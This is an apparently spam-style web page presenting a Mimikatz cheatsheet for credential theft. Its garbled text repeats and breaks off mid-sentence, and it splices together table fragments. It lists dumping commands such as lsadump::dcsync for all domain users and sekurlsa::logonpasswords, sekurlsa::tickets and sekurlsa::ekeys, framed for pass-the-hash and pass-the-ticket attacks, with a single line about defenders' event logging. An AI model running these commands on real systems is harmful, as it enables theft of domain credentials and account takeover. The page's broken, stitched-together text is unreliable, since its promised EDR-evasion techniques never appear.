Mimikatz Cheatsheet !!top!! -

Because modern EDR kills mimikatz.exe , use these techniques:

| Command | Result | | :--- | :--- | | lsadump::dcsync /user:Administrator | Get hash of a specific user without touching LSASS. | | lsadump::dcsync /all | Dump domain user hash. This is catastrophic for the blue team. | mimikatz cheatsheet

This is the classic "pass-the-hash" or "pass-the-password" attack. Because modern EDR kills mimikatz

: Security teams monitor for the privilege::debug command and the loading of unusual drivers, which are often logged in Event ID 4672 or 4688. | This is the classic "pass-the-hash" or "pass-the-password"

| Command | Result | | :--- | :--- | | sekurlsa::logonpasswords | Dumps all active logon sessions (NTLM hashes + plaintext if WDigest is enabled). | | sekurlsa::tickets | Dumps all Kerberos tickets for pass-the-ticket attacks. | | sekurlsa::ekeys | Dumps Kerberos encryption keys (useful for Overpass-the-Hash). |